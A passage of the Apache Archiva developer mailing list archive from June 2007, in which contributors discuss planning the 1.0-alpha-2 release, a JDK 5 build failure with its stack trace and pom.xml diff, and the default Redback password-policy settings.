Fabrice Bellingard wrote: >> > Hi Joakim, >> > >> > which proxy related bugs do you think of? I've tested Archiva proxying >> > for >> > some days, and it works pretty good for me. I mean, if we'd have to >> > release >> > alpha-2, I wouldn't say no. :-) >> > >> > Fabrice. >> > >> > On 6/19/07, Joakim Erdfelt <[email protected]> wrote: >> >> >> >> There are a few proxy related bugs left to work out in >> 1.0-alpha-2, I'd >> >> like to get a functional proxying working for the 1.0-alpha-2 >> release. >> >> >> >> I think this weekend might be doable. But that depends on the help >> >> testing the bug fixes. >> >> >> >> - Joakim >> >> >> >> Wendy Smoak wrote: >> >> > How does the weekend of June 23rd sound for another Archiva alpha >> >> > release? Joakim, are you already planning to do one before then? >> >> > >> >> > Any thoughts on how many of the 110 issues marked for >> 1.0-alpha-2 in >> >> > jira could actually make it in that two-week time frame? >> >> > >> >> > Thanks, >> >> > Wendy >> >> > >> >> >> >> >> > >> >> >> -- >> - Joakim Erdfelt >> Committer and PMC Member, Apache Maven >> Archiva Developer >> [email protected] >> [email protected] >> Alpaca Founding Member >> >> > > -- - Joakim Erdfelt [email protected] Open Source Software (OSS) Developer From [email protected] Wed Jun 20 18:39:23 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55699 invoked from network); 20 Jun 2007 18:39:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 18:39:22 -0000 Received: (qmail 57477 invoked by uid 500); 20 Jun 2007 18:39:25 -0000 Delivered-To: [email protected] Received: (qmail 57440 invoked by uid 500); 20 Jun 2007 18:39:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57431 invoked by uid 99); 20 Jun 2007 18:39:25 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 11:39:25 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 11:39:20 -0700 Received: by wx-out-0506.google.com with SMTP id s9so283249wxc for <[email protected]>; Wed, 20 Jun 2007 11:39:00 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=uabrF0B2WLodjkKtCCpU8EFhLVln1440QyvejPQ5EWYZ4qi4ZqE41N/iIG9kVASLImrg1wlK5kuEbo8yawKHAt9e/6s71BDsU5NjfhWicP5Tzyulg8Nfbh9VHCnGnLl0UA/SX67LJ220sPyDRUgol45M03+5YKki2KWtKVmV/XE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=usOcj6MiNIO3ODisTJoOnHF711ch0Q5l0A6ooh1xhw6EJME/vTY9dJ3f3eSNrIZG/RP3EjW2uyKQto8B0Fp4ipvkITOfgub1ysNByAXeURwddiP201U6S9RAoJ+NrslvP45lrGBI+pP5BMvcjInhjJ/+t2yTabPpHFX2tSgIuq8= Received: by 161.129.204.104 with SMTP id l18mr896022agc.1182364739806; Wed, 20 Jun 2007 11:38:59 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Jun 2007 11:38:59 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 20:38:59 +0200 From: "Arnaud HERITIER" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_68766_27750422.1182364739701" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_68766_27750422.1182364739701 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline ok, fine ! thanks a lot !! Arnaud On 20/06/07, Joakim Erdfelt <[email protected]> wrote: > > m1 is just postponed to a release after 1.0-alpha-2, and before 1.0-final > It's not out, it's not forgotten. :-) > > The "1.0.x" fix version is just a holding area for 1.0 related jiras. > Things that are post-1.0 are in the "Future" fix version right now. > > When I get back from my various trips these next few weeks I'll be > working on the 2 "big" pieces left for archiva 1.0 (Reporting and m1 > support) > > - Joakim > > Arnaud HERITIER wrote: > > I don't agree to postpone m1 support for 1.0.X. It's one of the feature > > which create the difference with others proxy repo tools... It's the > > feature > > which help to install archiva in corporate contexts... > > > > Arnaud > > > > On 20/06/07, Joakim Erdfelt <[email protected]> wrote: > >> > >> Fabrice, > >> > >> Excellent news! :-) > >> > >> Check out jira. > >> > >> We recently moved a large chunk of issues out of 1.0-alpha-2 to the > >> nebulous 1.0.x fix version. > >> The remaining list in 1.0-alpha-2 I consider to be important enough to > >> address for 1.0-alpha-2, even if that means, a message on the jira that > >> says "yes, I recognize this as an issue in 1.0-alpha-2, but well > >> postpone it to 1.0-beta-1" ;-) > >> > >> - Joakim > >> > >> Fabrice Bellingard wrote: > >> > Hi Joakim, > >> > > >> > which proxy related bugs do you think of? I've tested Archiva > proxying > >> > for > >> > some days, and it works pretty good for me. I mean, if we'd have to > >> > release > >> > alpha-2, I wouldn't say no. :-) > >> > > >> > Fabrice. > >> > > >> > On 6/19/07, Joakim Erdfelt <[email protected]> wrote: > >> >> > >> >> There are a few proxy related bugs left to work out in > >> 1.0-alpha-2, I'd > >> >> like to get a functional proxying working for the 1.0-alpha-2 > >> release. > >> >> > >> >> I think this weekend might be doable. But that depends on the help > >> >> testing the bug fixes. > >> >> > >> >> - Joakim > >> >> > >> >> Wendy Smoak wrote: > >> >> > How does the weekend of June 23rd sound for another Archiva alpha > >> >> > release? Joakim, are you already planning to do one before then? > >> >> > > >> >> > Any thoughts on how many of the 110 issues marked for > >> 1.0-alpha-2 in > >> >> > jira could actually make it in that two-week time frame? > >> >> > > >> >> > Thanks, > >> >> > Wendy > >> >> > > >> >> > >> >> > >> > > >> > >> > >> -- > >> - Joakim Erdfelt > >> Committer and PMC Member, Apache Maven > >> Archiva Developer > >> [email protected] > >> [email protected] > >> Alpaca Founding Member > >> > >> > > > > > > > -- > - Joakim Erdfelt > [email protected] > Open Source Software (OSS) Developer > > -- .......................................................... Arnaud HERITIER .......................................................... OCTO Technology - [email protected] www.octo.com | blog.octo.com .......................................................... ASF - [email protected] www.apache.org | maven.apache.org ........................................................... ------=_Part_68766_27750422.1182364739701-- From [email protected] Wed Jun 20 19:08:00 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66394 invoked from network); 20 Jun 2007 19:07:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 19:07:58 -0000 Received: (qmail 9190 invoked by uid 500); 20 Jun 2007 19:08:01 -0000 Delivered-To: [email protected] Received: (qmail 9146 invoked by uid 500); 20 Jun 2007 19:08:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9137 invoked by uid 99); 20 Jun 2007 19:08:01 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 12:08:01 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 12:07:57 -0700 Received: by an-out-0708.google.com with SMTP id d30so68613and for <[email protected]>; Wed, 20 Jun 2007 12:07:36 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=jcrg4AJnBoRVvZyEDouxUjx24+WVKtUhvmVE+q+rcZoGpGAnWEC2Sm1oJPnUY7m3zYpjXpqoZakVz98PdEJEEw+UjRx/KgHOAPCDQFNQDLJ+FQeXOUaZn/8QA9Tx2lztCI15yHIMISDzdM5XyNmpOw9bv/+qYrkpkprfQMf9TC0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=HVQZkZ2Tux6YKmQJmEMoYEU97XhZd4GMjRSkEuN6ToB0KW5pw7B87OtZXJDPPwWErdHjc15VafayY+SLo36Y+XAC0ArFbnPFeZr2ezo8c8u35o0f/aqul6JOil0kDa7faFzp1TWkI1dC5hprZLZJC1kZ01LIwiea+dOu1S/FxNI= Received: by 161.129.204.104 with SMTP id 20mr609202anj.1182366456721; Wed, 20 Jun 2007 12:07:36 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Jun 2007 12:07:36 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 12:07:36 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/19/07, Fabrice Bellingard <[email protected]> wrote: > which proxy related bugs do you think of? I've tested Archiva proxying for > some days, and it works pretty good for me. I mean, if we'd have to release > alpha-2, I wouldn't say no. :-) That's good to know. I see 14 closed issues in alpha-2, and a few more that are probably fixed (399 may have been solved by 370). I won't have time to test until Friday, but if everything seems to be in order I'll go ahead with alpha-2 so we have another milestone to work from. -- Wendy From [email protected] Wed Jun 20 23:27:54 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73259 invoked from network); 20 Jun 2007 23:27:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 23:27:53 -0000 Received: (qmail 81573 invoked by uid 500); 20 Jun 2007 23:27:56 -0000 Delivered-To: [email protected] Received: (qmail 81487 invoked by uid 500); 20 Jun 2007 23:27:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81477 invoked by uid 99); 20 Jun 2007 23:27:56 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 16:27:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 16:27:51 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAACBUeUY6slGq/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,444,1175436000"; d="scan'208";a="52410680" Received: from 170.049.dsl.brs.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 21 Jun 2007 09:27:28 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: Use of JDK 5 in Archiva Date: Thu, 21 Jun 2007 09:27:24 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org No problems here, or on the solaris zone. You ran with clean as well? I'd suggest upgrading your JDK if it really is _01 - that's pretty old :) - Brett On 20/06/2007, at 8:42 PM, Fabrice Bellingard wrote: > Hi Brett, > > I updated my workspace today and tried to build Archiva, and I get > an error > during JPOX enhancement, in the archiva-model module > (UnsupportedClassVersionError, see at the end of the mail for the > log). If I > use the last revision of the Archiva's root POM (that is, with > compiler set > to 1.4), then Archiva builds fine. > I'm using JDK 1.5.0_01 to run Maven. > > Any idea? > > Thanks, > Fabrice. > > ============================================================ > > INFO [JPOX.Enhancer] - JPOX Enhancer : Input Files > JPOX Enhancer : Input Files > INFO [JPOX.Enhancer] - >> > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target > \classes\org\apache\maven\archiva\model\package.jdo >>> > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target > \classes\org\apache\maven\archiva\model\package.jdo > > INFO [JPOX.Enhancer] - JPOX Enhancer : Using ClassEnhancer "BCEL" > JPOX Enhancer : Using ClassEnhancer "BCEL" > > > [ERROR] -------------------- > [ERROR] Standard error from the JPox enhancer tool: > [ERROR] -------------------- > [ERROR] java.lang.UnsupportedClassVersionError: > org/apache/maven/archiva/model/ArchivaRepositoryModel (Unsupported > major.minor version 49.0) > at java.lang.ClassLoader.defineClass0(Native Method) > at java.lang.ClassLoader.defineClass(Unknown Source) > at java.security.SecureClassLoader.defineClass(Unknown Source) > at java.net.URLClassLoader.defineClass(Unknown Source) > at java.net.URLClassLoader.access$100(Unknown Source) > at java.net.URLClassLoader$1.run(Unknown Source) > at java.security.AccessController.doPrivileged(Native Method) > at java.net.URLClassLoader.findClass(Unknown Source) > at java.lang.ClassLoader.loadClass(Unknown Source) > at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source) > at java.lang.ClassLoader.loadClass(Unknown Source) > at org.jpox.JDOClassLoaderResolver.classOrNull( > JDOClassLoaderResolver.java:510) > at org.jpox.JDOClassLoaderResolver.classForName( > JDOClassLoaderResolver.java:196) > at org.jpox.JDOClassLoaderResolver.classForName( > JDOClassLoaderResolver.java:362) > at org.jpox.metadata.AbstractClassMetaData.loadClass( > AbstractClassMetaData.java:524) > at org.jpox.metadata.ClassMetaData.populate(ClassMetaData.java:215) > at org.jpox.metadata.MetaDataManager.populateFileMetaData( > MetaDataManager.java:1060) > at > org.jpox.enhancer.bcel.metadata.BCELMetaDataManager.populateRegistered > File( > BCELMetaDataManager.java:241) > at org.jpox.enhancer.bcel.BCELUtils.getMetaDataForInput > (BCELUtils.java > :175) > at org.jpox.enhancer.JPOXEnhancer.main(JPOXEnhancer.java:512) > Exception in thread "main" > > [ERROR] -------------------- > [INFO] > ---------------------------------------------------------------------- > -- > [ERROR] BUILD ERROR > [INFO] > ---------------------------------------------------------------------- > -- > [INFO] The JPox enhancer tool exited with a non-null exit code. > [INFO] > ---------------------------------------------------------------------- > -- > > ============================================================ > > > On 6/19/07, Brett Porter <[email protected]> wrote: >> >> As in Continuum, I've made this change. I'm going with lazy consensus >> - so if there are any objections please holler before dependent code >> arrives :) >> >> On 19/06/2007, at 11:26 AM, [email protected] wrote: >> >> > Author: brett >> > Date: Mon Jun 18 18:26:34 2007 >> > New Revision: 548544 >> > >> > URL: http://svn.apache.org/viewvc?view=rev&rev=548544 >> > Log: >> > allow use of JDK 5 in Archiva >> > >> > Modified: >> > maven/archiva/trunk/pom.xml >> > >> > Modified: maven/archiva/trunk/pom.xml >> > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? >> > view=diff&rev=548544&r1=548543&r2=548544 >> > >> ===================================================================== >> = >> > ======== >> > --- maven/archiva/trunk/pom.xml (original) >> > +++ maven/archiva/trunk/pom.xml Mon Jun 18 18:26:34 2007 >> > @@ -95,11 +95,31 @@ >> > </execution> >> > </executions> >> > </plugin> >> > +<!-- Doesn't work on Mac with Java 6 yet >> > + <plugin> >> > + <artifactId>maven-enforcer-plugin</artifactId> >> > + <executions> >> > + <execution> >> > + <id>enforce-java</id> >> > + <goals> >> > + <goal>enforce-once</goal> >> > + </goals> >> > + <configuration> >> > + <rules> >> > + <requireJavaVersion> >> > + <version>1.5.0</version> >> > + </requireJavaVersion> >> > + </rules> >> > + </configuration> >> > + </execution> >> > + </executions> >> > + </plugin> >> > +--> >> > <plugin> >> > <artifactId>maven-compiler-plugin</artifactId> >> > <configuration> >> > - <source>1.4</source> >> > - <target>1.4</target> >> > + <source>1.5</source> >> > + <target>1.5</target> >> > </configuration> >> > </plugin> >> > <plugin> >> > >> From [email protected] Wed Jun 20 23:51:29 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79706 invoked from network); 20 Jun 2007 23:51:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 23:51:28 -0000 Received: (qmail 14854 invoked by uid 500); 20 Jun 2007 23:51:31 -0000 Delivered-To: [email protected] Received: (qmail 14821 invoked by uid 500); 20 Jun 2007 23:51:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14812 invoked by uid 99); 20 Jun 2007 23:51:31 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 16:51:31 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 16:51:27 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAAdaeUY6slGq/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,444,1175436000"; d="scan'208";a="52415168" Received: from 170.049.dsl.brs.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 21 Jun 2007 09:51:02 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: Default Password Controls in Archiva ( MRM-229 / MRM-225 ) Date: Thu, 21 Jun 2007 09:50:58 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org The only one I'd change is the maximum. I don't really understand the usefulness of that and it's hit me a couple of times. - Brett On 18/06/2007, at 8:12 PM, Joakim Erdfelt wrote: > There has been some controversy on the closing of MRM-229 and MRM-225, > I feel that they should remain closed. > > The defaults that you see here are not archiva specific, and are > the same > defaults you see in all other redback applications (including > continuum) > > The fact that you can change these by adding them to one of the > following > user controlled files should be enough ... > > ${user.home}/.m2/security.properties > ${user.home}/.m2/archiva.properties > ${appserver.base}/conf/security.properties > ${appserver.home}/conf/security.properties > > The defaults are sane to some people, and not sane to others. > If we can't agree to a set of defaults for Archiva by Thursday > morning, > then the above defaults stick, and the work for this should sit on the > redback UI side for easy reconfigurability. > > Yes, before you start arguing about me closing them as won't fix ... > Yes, I am taking an iron fist approach to jiras MRM-229 and MRM-225. > If you wanted them changed, you should have commented in the jiras > sooner. Those jiras were open for 6 months, noone offered any > suggestions on values, > and the ability to change them without a recompile exists. In my > world, that means there is no problem. > > Onto the technical details ... > > In Archiva we use redback for our security. > It has several ways to enforce password complexity (uniformly) > across all password proposals. > > First, lets look at what can be changed. > ( list from http://maven.apache.org/archiva/guides/security- > configuration.html ) > > security.policy.allowed.login.attempt=3 > This is a policy setting that allows for only 3 login > attempts before the account is locked out. > Currently set to 3 attempts. > > security.policy.password.previous.count=6 > This sets the total number of previous passwords to record. > security.policy.password.rule.reuse.enabled=true > This sets the password rule on reuse, preventing reusing any > of the previous passwords on the account. > Currently turned on, and will check the previous password > list for the last 6 passwords. > > security.policy.password.expiration.days=90 > This sets the total amount of time a password is valid, > in days. Forcing the user to change their password when > this interval is up. > Currently set for 90 day password expiration. > > security.policy.password.rule.alphanumeric.enabled=false > Password rule that ensures the password is a mix of > alpha and numeric characters. > Currently turned off > > security.policy.password.rule.alphacount.enabled=true > security.policy.password.rule.alphacount.minimum=1 > Password rule that ensure the password contains a minimum > number of alphabetic (a-zA-Z) characters. > Currently turned on and requires 1 alphabetic character > to exist in the proposed password. > > security.policy.password.rule.numericalcount.enabled=true > security.policy.password.rule.numericalcount.minimum=1 > Password rule that ensure the password contains a minimum > number of numerical (0-9) characters. > Currently turned on and requires 1 numerical character > to exist in the proposed password. > > security.policy.password.rule.characterlength.enabled=true > security.policy.password.rule.characterlength.minimum=1 > security.policy.password.rule.characterlength.maximum=8 > Password rule that ensure the password character > length is within a specific character length. > Currently turned on and requires a password to be > between 1 and 8 characters in length. > (Can be any combination of alpha or numeric) > > > security.policy.password.rule.musthave.enabled=true > Simple password rule that ensure that the password proposal > contains some, any content. > Currently turned on. (Similar in scope to characterlength rule) > > security.policy.password.rule.nowhitespace.enabled=true > Password rule that ensure that there are no whitespace characters > present in the proposed password. > Currently turned on. > > -- > - Joakim Erdfelt > [email protected] > Open Source Software (OSS) Developer From [email protected] Wed Jun 20 23:55:40 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80712 invoked from network); 20 Jun 2007 23:55:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2007 23:55:39 -0000 Received: (qmail 19824 invoked by uid 500); 20 Jun 2007 23:55:43 -0000 Delivered-To: [email protected] Received: (qmail 19709 invoked by uid 500); 20 Jun 2007 23:55:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19688 invoked by uid 99); 20 Jun 2007 23:55:42 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 16:55:42 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Jun 2007 16:55:29 -0700 Received: by an-out-0708.google.com with SMTP id d30so86004and for <[email protected]>; Wed, 20 Jun 2007 16:55:08 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=fpaPy7vymKA3txBJ+y1m0u/6R9h8F/GqxnCJ1GkznOgr5ykaW1bIOt+wAnmIhOrexbJ/iAr6zewsoxaqZ2IVUy8tte2fo/LrzqsKFyg+JOMBUFOMiSSiLD7LpB3d00H0MU92M5u7xdkC7aal6G8UsaRnLKLQEx10vEycGlCqQcY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Sw21Wxc5HqaHbPdWc07fodMmCvmHspw9yX59hZQaTBoHvdDWy0NWWb298u3CYME29F+emVR1v8wNc4mUseh0OehNiS7OpYlaytw+78zsBGrJ6nbCWVaj8s7UcNrzwFKKE6af8dJ9z2YWQRiPEFechTFiId+oR4+DTwZUdqNjBNI= Received: by 161.129.204.104 with SMTP id g11mr747469anc.1182383708706; Wed, 20 Jun 2007 16:55:08 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Jun 2007 16:55:08 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Jun 2007 16:55:08 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: Default Password Controls in Archiva ( MRM-229 / MRM-225 ) In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/20/07, Brett Porter <[email protected]> wrote: > The only one I'd change is the maximum. I don't really understand the > usefulness of that and it's hit me a couple of times. Same here. Jesse already said he'd change it in Redback, so Archiva will pick up the change at some point. -- Wendy From [email protected] Thu Jun 21 07:53:48 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16155 invoked from network); 21 Jun 2007 07:53:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2007 07:53:46 -0000 Received: (qmail 10690 invoked by uid 500); 21 Jun 2007 07:53:50 -0000 Delivered-To: [email protected] Received: (qmail 10656 invoked by uid 500); 21 Jun 2007 07:53:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10647 invoked by uid 99); 21 Jun 2007 07:53:49 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 00:53:49 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 00:53:45 -0700 Received: by an-out-0708.google.com with SMTP id d30so107685and for <[email protected]>; Thu, 21 Jun 2007 00:53:24 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=he3yDGimoCm/Jg2fR6/1AhG1LtTZIAWoNOOU21G1EEP9SKwy+AMmex00l2zE9Hy7Or/wWIuJ6Y9gtNsm9BztSku3/KPCJGiQ+3w3369cY6TAMud0dvwjXWZzQKd4QAVtcQcdhFHwhloEyh5nq2M5hJ0MBRkI11TE7UHl8nxlBHM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=eDsI3OoNxhaXBKxgX0aTjvBVQhnaJ9Zo4Ijy/hPhALL4bO7eQfqSEuf+Ih/l+g7IhIytR1hIv2uQFTMgtfKxmJXpB/Ae3VJYPKdwIQqNTRPlRU6sbXLEpncQNkgOgCAyaJ6DFtG2Kb4hFRt4gdg1017KepGcJ4bdCzAjavNqpnI= Received: by 161.129.204.104 with SMTP id v9mr917719anc.1182412404231; Thu, 21 Jun 2007 00:53:24 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 21 Jun 2007 00:53:24 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 21 Jun 2007 09:53:24 +0200 From: "Fabrice Bellingard" <[email protected]> To: [email protected] Subject: Re: Use of JDK 5 in Archiva In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_48616_19956992.1182412404198" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_48616_19956992.1182412404198 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Still the same problem running a "clean install" with the following configuration: - Win2k - JDK 1.5.0_012 - Maven 2.0.7 No one else has the same issue? Fabrice. On 6/21/07, Brett Porter <[email protected]> wrote: > > No problems here, or on the solaris zone. You ran with clean as well? > > I'd suggest upgrading your JDK if it really is _01 - that's pretty > old :) > > - Brett > > On 20/06/2007, at 8:42 PM, Fabrice Bellingard wrote: > > > Hi Brett, > > > > I updated my workspace today and tried to build Archiva, and I get > > an error > > during JPOX enhancement, in the archiva-model module > > (UnsupportedClassVersionError, see at the end of the mail for the > > log). If I > > use the last revision of the Archiva's root POM (that is, with > > compiler set > > to 1.4), then Archiva builds fine. > > I'm using JDK 1.5.0_01 to run Maven. > > > > Any idea? > > > > Thanks, > > Fabrice. > > > > ============================================================ > > > > INFO [JPOX.Enhancer] - JPOX Enhancer : Input Files > > JPOX Enhancer : Input Files > > INFO 